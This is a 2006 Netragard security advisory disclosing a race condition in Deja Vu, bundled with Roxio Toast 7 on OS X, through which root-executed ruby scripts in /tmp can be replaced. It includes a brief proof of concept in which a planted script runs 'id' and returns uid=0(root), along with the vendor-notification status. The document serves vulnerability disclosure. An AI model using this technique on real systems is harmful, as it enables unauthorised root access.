ROXIO_RACE_NETRAGARD-20060624.txt

`******************** Netragard, L.L.C Advisory* *******************  
09/11/2006   
  
Strategic Reconnaissance Team  
------------------------------------------------  
http://www.netragard.com -- "We make I.T. Safe."  
  
  
[About Netragard]  
----------------------------------------------------------------------  
Netragard is a unique I.T. Security company whose services are  
fortified by continual vulnerability research and development. This  
ongoing research, which is performed by our Strategic Reconnaissance  
Team, specifically focuses on Operating Systems and Applications  
commonly used by businesses internationally. We apply the knowledge  
gained by performing this research to our professional security  
services. This in turn enables us to produce high quality deliverables  
that are the product of talented security professionals and not those  
of automated scanners and tools. This advisory is the product of  
research done by the Strategic Reconnaissance Team.  
  
  
[ For more information please visit http://www.netragard.com ]  
  
  
[Advisory Information]  
----------------------------------------------------------------------  
Contact : Adriel T. Desautels  
Advisory ID : NETRAGARD-20060624  
Product Name : Roxio Toast  
Product Version : 7 Titanium  
Vendor Name : Sonic Solutions / Propaganda Productions  
Type of Vulnerability : Local Root Compromise  
Effort : Difficult, depends on timing.  
Operating System : OSX  
Other : Race Condition Explpoitation in Deja Vu which  
is bundled into Roxio Toast. Deja Vu is the  
product of Propaganda Productions.  
  
Official Advisory URL:  
----------------------------------------------------------------------  
http://www.netragard.com/pdfs/research/ROXIO_RACE_NETRAGARD-20060624.txt  
  
  
[Product Description]  
----------------------------------------------------------------------  
"Toast 7 is the best way to save, share and enjoy a lifetime of digital  
music, movies and photos on CD and DVD. Burn large files across  
multiple discs; compress and copy DVD movies; add over 50 hours of  
music to an audio DVD with on-screen TV menus, shuffle play, and rich  
Dolby Digital sound; burn DivX files into DVDs. Do it all with the  
fastest and most reliable burning software for the Mac OS - Toast."  
  
  
  
--http://www.roxio.com--  
  
  
[Technical Summary]  
----------------------------------------------------------------------  
Deja Vu, which is bundled with Roxio Toast 7, creates ruby scripts in  
the /tmp directory. These scripts contain commands which are executed  
with escilated privileges. A race condition exists which makes it  
possible to execute arbritrary commands against the system or gain  
root level access.  
  
  
  
[Technical Details]  
----------------------------------------------------------------------  
This was tested using a configured version of Roxio Toast 7 Titanium.  
(reproduction depends on timing)  
  
  
  
######################################################################  
#  
# dejavu_manual.rb was created by user test  
#  
######################################################################  
netragard-test> ls -al /tmp/dejavu_manual.rb  
-rw-r--r-- 1 test wheel 32843 Jul 7 21:41 /tmp/dejavu_manual.rb  
  
  
######################################################################  
#  
# The contents of dejavu_manual.rb  
#  
######################################################################  
netragard-test>cat test.rb  
#!/usr/bin/ruby  
system '/usr/bin/id'  
  
  
######################################################################  
#  
# 1) Open the System Preferences  
# 2) Click on deja vu  
# 3) Perform a manual backup.  
# 4) Notice uid=0(root)  
#  
######################################################################  
netragard-test> /Applications/System\ Preferences.app/Contents/MacOS/  
System\ Preferences  
  
  
uid=0(root) gid=501(test) groups=501(test),  
81(appserveradm), 79(appserverusr), 80(admin)  
  
  
  
[Proof Of Concept]   
----------------------------------------------------------------------  
Demonstrated above.  
  
  
  
[Vendor Status]  
----------------------------------------------------------------------  
Propaganda Productions was notified by Sonic Solutions on behalf of  
Netragard, L.L.C. on August 10th 2006. As of today Netragard has not  
received any response from Propaganda Productions.  
  
  
[Disclaimer]  
---------------------http://www.netragard.com-------------------------  
Netragard, L.L.C. assumes no liability for the use of the information  
provided in this advisory. This advisory was released in an effort to  
help the I.T. community protect themselves against a potentially  
dangerous security hole. This advisory is not an attempt to solicit  
business.  
  
  
Regards,  
Netragard Strategic Reconnaissance Team  
advisories at netragard dot com  
http://www.netragard.com  
-------------------------  
"We make I.T. Secure"  
  
  
  
  
  
  
`